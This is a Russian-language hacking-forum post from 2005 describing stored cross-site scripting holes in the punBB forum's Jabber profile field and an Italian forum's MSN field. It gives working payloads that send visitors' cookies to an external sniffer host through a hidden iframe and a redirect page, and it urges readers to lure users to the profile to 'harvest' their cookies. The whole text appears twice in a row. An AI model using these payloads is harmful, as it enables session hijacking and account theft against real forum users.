PinkPanther
22.03.2005, 23:23
И опять дыра в профиле....что в принципе хорошо, для нас=)
1 уязвимость найдена мной в форуме punbb, позволяет вставить скрипт, в поле Jabber, что находится в профиле.
Так как длинна ограничена 75 символами, следует кроме банального алерта "><script>alert('')</script> стандартный скрипт для пересылки куков на снифф <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
вставить как бы и не удастся. Но мы поступим по другому. Зарегестрируем, к примеру, на .holm`e такой сайт: r.h15.ru
и в корневую папку кинем html`овский файл index.html, со строкой <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
т.е. сделаем небольшой редирект на античатовский сниффер. Теперь, поместив в поле Jabber строку с невидимым фреймом "><iframe src=http://r.h15.ru/index.html height=0></iframe>
в котором отображается страница нашего редиректа, кукисы всех кто заглянет на эту страницу улетят на снифф античата.
Осталось только заманить пользователей форума заглянуть в твой профайл, и можно идти собирать урожай=)
2 уязвимость найдена в форуме lux. Форум итальянский, и довольно распостраненный, у итальянцев.
Тут, поле подверженное нашему воздействию называется MSN, количество вводимых символов ограничено 40, вставляем сплойт"><iframe src=http://r.15.ru/ height=0>
который занимает как раз 38 символа, и добываем кукисы.
1 уязвимость найдена мной в форуме punbb, позволяет вставить скрипт, в поле Jabber, что находится в профиле.
Так как длинна ограничена 75 символами, следует кроме банального алерта "><script>alert('')</script> стандартный скрипт для пересылки куков на снифф <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
вставить как бы и не удастся. Но мы поступим по другому. Зарегестрируем, к примеру, на .holm`e такой сайт: r.h15.ru
и в корневую папку кинем html`овский файл index.html, со строкой <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
т.е. сделаем небольшой редирект на античатовский сниффер. Теперь, поместив в поле Jabber строку с невидимым фреймом "><iframe src=http://r.h15.ru/index.html height=0></iframe>
в котором отображается страница нашего редиректа, кукисы всех кто заглянет на эту страницу улетят на снифф античата.
Осталось только заманить пользователей форума заглянуть в твой профайл, и можно идти собирать урожай=)
2 уязвимость найдена в форуме lux. Форум итальянский, и довольно распостраненный, у итальянцев.
Тут, поле подверженное нашему воздействию называется MSN, количество вводимых символов ограничено 40, вставляем сплойт"><iframe src=http://r.15.ru/ height=0>
который занимает как раз 38 символа, и добываем кукисы.